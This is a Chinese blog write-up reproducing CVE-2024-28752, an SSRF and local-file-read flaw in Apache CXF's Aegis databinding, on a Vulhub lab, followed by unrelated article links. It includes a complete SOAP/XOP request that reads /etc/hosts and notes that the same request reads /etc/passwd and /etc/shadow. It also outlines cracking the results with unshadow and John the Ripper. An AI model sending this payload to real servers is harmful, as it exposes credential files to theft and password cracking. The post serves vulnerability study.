Vulhub 中的 apache-cxf CVE-2024-28752

0x00 前言

声明:本文仅做学习交流,遵守《网络安全法》。

那么先学习漏洞原理吧,Apache CXF 是一个开源的服务框架,帮助开发者使用 JAX-WS 和 JAX-RS 等前端编程 API 构建和开发服务。

Apache CXF 在 4.0.4、3.6.3 和 3.5.8 版本之前存在一个使用 AegisDataBinding 的 SSRF 漏洞,该漏洞允许攻击者对接受至少一个任意类型参数的 Web 服务执行 SSRF 攻击。此漏洞专门影响使用 AegisDataBinding 的服务,而使用其他数据绑定 (包括默认数据绑定) 的服务不受影响。攻击者可以利用此漏洞通过让服务器向任意 URL发送请求来访问内部资源,这可能导致信息泄露或对内部系统的进一步攻击。

0x01 CVE-2024-28752

首先用nmap扫描一下端口。

用dirsearch 扫描一下。

复制代码
python3 dirsearch.py -u "http://192.168.217.166:8080/" -r

访问一下。

此事定有蹊跷!使用burp发送构造poc。

复制代码
POST /test HTTP/1.1
Host:192.168.217.166:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close

------kkkkkk123123213
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--

回显是base64加密的。

解个密。

那同理,可以修改poc查看/etc/passwd文件。

同理还可以看/etc/shadow文件。

到此,该漏洞复现完毕。

0x02 总结

其实呢,有了passwd和shadow文件之后,我有把这两个文件单独存档,通过unshadow命令进行整合之后,利用john the rapper进行密码破解。可惜了,查看到的shadow文件没有hash值,无法破解出密码。

简单的再记录一下使用john的过程。

首先,利用unshadow命令将passwd和shadow文件整合成一个文件,再利用john进行破解。

使用过程中出现"No password hashes loaded"的时候,需要指定john参数为crypt。

好吧,糊弄的密码被公之于众了。

相关推荐
紫金桥软件3 小时前
紫金桥组态软件RealSCADA——筑牢电力数智化基石
安全·scada·国产工业软件·电力行业·监控组态软件
谪星·阿凯3 小时前
内网隧道与代理实战博客
网络安全
上海云盾-小余4 小时前
域名解析被劫持怎么办?DNS 安全防护与异常修复全教程
网络·安全·ddos
科技风向标go4 小时前
**2026年Q2中国消费级监控摄像头市场观察:存量时代的竞争逻辑重构**
网络·安全·监控·户外安防
无心水4 小时前
【Hermes:安全、权限与生产环境】38、Hermes Agent 安全四层纵深:最小权限原则从理论到落地的完全指南
人工智能·安全·mcp协议·openclaw·养龙虾·hermes·honcho
视觉&物联智能7 小时前
【杂谈】-当人工智能能力增速凌驾于安全管控模型之上
人工智能·安全·ai·chatgpt·agi·deepseek
梧六柒7 小时前
2-文件类型绕过
网络安全
m0_738120728 小时前
ctfshow靶场SSRF部分——基础绕过到协议攻击解题思路与技巧(一)
服务器·前端·网络·安全·php
2301_780789669 小时前
“数字珍珠港”再现:西北能源基地DNS篡改事件深度复盘与防护升级
运维·服务器·网络·tcp/ip·网络安全·智能路由器·能源
ShiMetaPi9 小时前
OpenClaw 部署指南:四种部署模式解析与安全加固建议
安全·open claw